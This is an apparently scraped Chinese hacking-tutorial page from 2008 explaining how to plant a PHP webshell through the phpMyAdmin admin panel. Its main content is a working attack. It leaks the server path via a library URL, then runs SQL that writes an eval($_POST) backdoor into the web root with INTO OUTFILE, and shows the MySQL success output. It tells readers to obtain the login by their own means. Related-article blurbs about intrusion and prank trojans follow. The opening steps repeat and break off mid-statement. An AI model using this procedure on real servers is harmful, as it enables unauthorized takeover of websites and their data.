教你phpMyAdmin 后臺拿webshell
互聯網 發(fā)布時間:2008-10-08 18:23:30 作者:佚名
我要評論

1.如何拿到登陸密碼,自己想辦法。
2.訪問 : http://url/phpmyadmin/libraries/select_lang.lib.php 得到物理路徑.
3.選擇一個Database.運行以下語句.
----start code---
Create TABLE a (cmd text NOT NULL);
Insert INTO a (cmd) VALUES('<?php e
1.如何拿到登陸密碼,自己想辦法。
2.訪問 : http://url/phpmyadmin/libraries/select_lang.lib.php 得到物理路徑.
3.選擇一個Database.運行以下語句.
----start code---
Create TABLE a (cmd text NOT NULL);
Insert INTO a (cmd) VALUES('<?php eval($_POST[1]);?>');
select cmd from a into outfile 'F:/Program Files/Apache Group/Apache2/htdocs/phpMyAdmin/d.php/d.php';
Drop TABLE IF EXISTS a;
----end code---
4.如果沒什么意外.對應網站得到webshell
您運行的 SQL 語句已經成功運行了。
SQL 查詢:
CREATE TABLE a(
cmd text NOT NULL
);# MySQL 返回的查詢結果為空(即零行)。
INSERT INTO a( cmd )
VALUES (
'<?php eval($_POST[1]);?>'
);# 影響列數: 1
SELECT cmd
FROM a
INTO OUTFILE 'F:/Program Files/Apache Group/Apache2/htdocs/phpMyAdmin/d.php';# 影響列數: 1
DROP TABLE IF EXISTS a;# MySQL 返回的查詢結果為空(即零行)。
相關文章
- 無論那類黑客,他們最初的學習內容都將是本部分所涉及的內容,而且掌握的基本技能也都是一樣的。即便日后他們各自走上了不同的道路,但是所做的事情也差不多,只不過出發(fā)點2013-04-16
- 首先申明: 1.入侵的范圍只包括局域網,如果在學校上,可以入侵整個校園網; 2.能入侵的只是存在弱口令(用戶名為administrator等,密碼為空),并且開了139端口2009-06-09
- 其實很簡單的的,說到原理,就一個:就是在人家網站的主頁那里插入一個自己的網馬的頁面,等有漏洞的人查看了人家網站的主頁,那么他就成了你的肉雞了。 下面我介紹5種方2009-04-30
- 入侵滲透涉及許多知識和技術,并不是一些人用一兩招就可以搞定的。 一,踩點 踩點可以了解目標主機和網絡的一些基本的安全信息,主要有; 1,管理員2008-10-08
- 這篇文章主要介紹了整人用的一個電腦重啟病毒,本文用bat文件偽造如QQ圖標等常用軟件,導致點擊就會重啟的惡作劇腳本,需要的朋友可以參考下2014-10-10
- 今天有網友問小編怎樣判斷電腦是否淪為“肉雞”,小編就來給大家盤點幾條電腦淪為肉雞的表現2014-08-14
- 站內搜索地址為: httpwww.google.comcustomdomains=(這里寫我們要搜索的站點,比如feelids.com) 進去可以選擇www和feelids.com, 當然再選我們要的站內搜索2008-10-08
偽黑客的成功的秘密:tomcat入侵和Jboss入侵的方法介紹(圖)
黑客必須要有專業(yè)的知識,豐富的經驗。而偽黑客不需要,只需要幾個工具,掃描默認口令、弱口令、漏洞,就能利用。2012-05-18- 入侵滲透涉及許多知識和技術,并不是一些人用一兩招就可以搞定的,下面小編就為大家具體的講解如何正確的進行網站入侵滲透測試,希望可以幫助到大家2016-10-28